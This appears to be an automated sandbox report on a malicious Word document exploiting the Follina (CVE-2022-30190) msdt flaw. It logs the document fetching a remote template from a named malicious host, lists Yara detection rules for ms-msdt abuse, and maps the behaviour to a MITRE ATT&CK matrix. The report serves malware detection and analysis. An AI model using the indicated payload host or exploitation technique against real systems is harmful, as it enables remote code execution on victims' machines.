      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficHTTP traffic detected: GET /456.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: www.malwarejake.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /456.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: www.malwarejake.comIf-Modified-Since: Tue, 31 May 2022 01:57:49 GMTIf-None-Match: "1b90-5e045198f8aaa"Connection: Keep-Alive
      Source: Joe Sandbox ViewASN Name: LDCOMNETFR LDCOMNETFR
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49179 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49180 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49181 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49182 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49186 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49187 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49188 version: TLS 1.0
      Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
      Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
      Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
      Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
      Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
      Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
      Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49190 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49190
      Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
      Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.drString found in binary or memory: https://www.malwarejake.com/456.html
      Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.drString found in binary or memory: https://www.malwarejake.com/456.htmlyX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C04F3D99-F9B9-4448-A2CE-FCD4E5583AFE}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: www.malwarejake.com
      Source: global trafficHTTP traffic detected: GET /456.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: www.malwarejake.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /456.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: www.malwarejake.comIf-Modified-Since: Tue, 31 May 2022 01:57:49 GMTIf-None-Match: "1b90-5e045198f8aaa"Connection: Keep-Alive
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49178 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
      Source: sslproxydump.pcap, type: PCAPMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: sslproxydump.pcap, type: PCAPMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
      Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: qoIZSkdejM.docxVirustotal: Detection: 35%
      Source: qoIZSkdejM.docxMetadefender: Detection: 22%
      Source: qoIZSkdejM.docxReversingLabs: Detection: 44%
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: qoIZSkdejM.LNK.0.drLNK file: ..\..\..\..\..\Desktop\qoIZSkdejM.docx
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$IZSkdejM.docxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR76F3.tmpJump to behavior
      Source: classification engineClassification label: mal96.expl.evad.winDOCX@1/18@15/1
      Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.drOLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.drInitial sample: OLE indicators vbamacros = False

      Persistence and Installation Behavior

      barindex
      Contains an external reference to another file
      Source: document.xml.relsExtracted files from sample: https://www.malwarejake.com/456.html!
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts13
      Exploitation for Client Execution      		Path InterceptionPath Interception1
      Masquerading      		OS Credential Dumping1
      File and Directory Discovery      		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
